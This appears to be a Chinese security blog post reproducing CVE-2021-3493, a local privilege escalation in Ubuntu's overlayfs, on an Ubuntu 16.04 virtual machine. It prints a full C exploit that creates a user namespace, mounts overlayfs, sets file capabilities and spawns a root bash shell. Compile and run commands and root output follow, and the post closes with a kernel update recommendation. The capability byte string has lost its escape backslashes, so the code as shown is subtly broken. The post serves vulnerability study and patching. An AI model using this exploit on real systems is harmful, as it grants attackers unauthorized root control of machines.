内核提权|关于CVE-2021-3493漏洞介绍以及复现
漏洞介绍
Ubuntu系统中的Linux内核的overlayfs文件系统没有正确的验证文件系统功能在用户名称空间中的应用,所以攻击者可以利用该漏洞将用户权限来提升至root权限。
影响版本
Ubuntu 20.10Ubuntu 20.04 LTSUbuntu 18.04 LTSUbuntu 16.04 LTSUbuntu 14.04 ESM
漏洞复现
这里使用ubuntu16.04,下载地址如下:
中科大源http://mirrors.ustc.edu.cn/ubuntu-releases/16.04/阿里云开源镜像站http://mirrors.aliyun.com/ubuntu-releases/16.04/兰州大学开源镜像站http://mirror.lzu.edu.cn/ubuntu-releases/16.04/北京理工大学开源http://mirror.bit.edu.cn/ubuntu-releases/16.04/
当然其它版本也可以,可以自己尝试。这里不建议去官网下载,速度不快。
安装好虚拟机之后
查看虚拟机内核
wrs@wrs-virtual-machine:~$ uname -a
下载exp得到exploit.c文件
https://github.com/briskets/CVE-2021-3493
#define _GNU_SOURCE#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <fcntl.h>#include <err.h>#include <errno.h>#include <sched.h>#include <sys/types.h>#include <sys/stat.h>#include <sys/wait.h>#include <sys/mount.h>//#include <attr/xattr.h>//#include <sys/xattr.h>int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);#define DIR_BASE "./ovlcap"#define DIR_WORK DIR_BASE "/work"#define DIR_LOWER DIR_BASE "/lower"#define DIR_UPPER DIR_BASE "/upper"#define DIR_MERGE DIR_BASE "/merge"#define BIN_MERGE DIR_MERGE "/magic"#define BIN_UPPER DIR_UPPER "/magic"static void xmkdir(const char *path, mode_t mode){if (mkdir(path, mode) == -1 && errno != EEXIST)err(1, "mkdir %s", path);}static void xwritefile(const char *path, const char *data){int fd = open(path, O_WRONLY);if (fd == -1)err(1, "open %s", path);ssize_t len = (ssize_t) strlen(data);if (write(fd, data, len) != len)err(1, "write %s", path);close(fd);}static void xcopyfile(const char *src, const char *dst, mode_t mode){int fi, fo;if ((fi = open(src, O_RDONLY)) == -1)err(1, "open %s", src);if ((fo = open(dst, O_WRONLY | O_CREAT, mode)) == -1)err(1, "open %s", dst);char buf[4096];ssize_t rd, wr;for (;;) {rd = read(fi, buf, sizeof(buf));if (rd == 0) {break;} else if (rd == -1) {if (errno == EINTR)continue;err(1, "read %s", src);}char *p = buf;while (rd > 0) {wr = write(fo, p, rd);if (wr == -1) {if (errno == EINTR)continue;err(1, "write %s", dst);}p += wr;rd -= wr;}}close(fi);close(fo);}static int exploit(){char buf[4096];sprintf(buf, "rm -rf '%s/'", DIR_BASE);system(buf);xmkdir(DIR_BASE, 0777);xmkdir(DIR_WORK, 0777);xmkdir(DIR_LOWER, 0777);xmkdir(DIR_UPPER, 0777);xmkdir(DIR_MERGE, 0777);uid_t uid = getuid();gid_t gid = getgid();if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)err(1, "unshare");xwritefile("/proc/self/setgroups", "deny");sprintf(buf, "0 %d 1", uid);xwritefile("/proc/self/uid_map", buf);sprintf(buf, "0 %d 1", gid);xwritefile("/proc/self/gid_map", buf);sprintf(buf, "lowerdir=%s,upperdir=%s,workdir=%s", DIR_LOWER, DIR_UPPER, DIR_WORK);if (mount("overlay", DIR_MERGE, "overlay", 0, buf) == -1)err(1, "mount %s", DIR_MERGE);// all+epchar cap[] = "x01x00x00x02xffxffxffxffx00x00x00x00xffxffxffxffx00x00x00x00";xcopyfile("/proc/self/exe", BIN_MERGE, 0777);if (setxattr(BIN_MERGE, "security.capability", cap, sizeof(cap) - 1, 0) == -1)err(1, "setxattr %s", BIN_MERGE);return 0;}int main(int argc, char *argv[]){if (strstr(argv[0], "magic") || (argc > 1 && !strcmp(argv[1], "shell"))) {setuid(0);setgid(0);execl("/bin/bash", "/bin/bash", "--norc", "--noprofile", "-i", NULL);err(1, "execl /bin/bash");}pid_t child = fork();if (child == -1)err(1, "fork");if (child == 0) {_exit(exploit());} else {waitpid(child, NULL, 0);}execl(BIN_UPPER, BIN_UPPER, "shell", NULL);err(1, "execl %s", BIN_UPPER);}
编译c文件
wrs@wrs-virtual-machine:~/桌面/CVE-2021-3493$ gcc exploit.c -o exploit
得到编译后的文件
执行编译后的exploit文件
wrs@wrs-virtual-machine:~/桌面/CVE-2021-3493$ ./exploit
会直接进入bash命令执行
bash-4.3# whoami
我复现的过程中并未用到
chmod +x 给执行权限的命令
这里wrs的账户权限并不是高级用户,当执行exp之后的root用户的权限uid=0
修复建议
更新Linux内核至5.11,关注厂商补丁
https://ubuntu.com/security/CVE-2021-3493
原文始发于微信公众号(鼎信安全):内核提权|关于CVE-2021-3493漏洞介绍以及复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论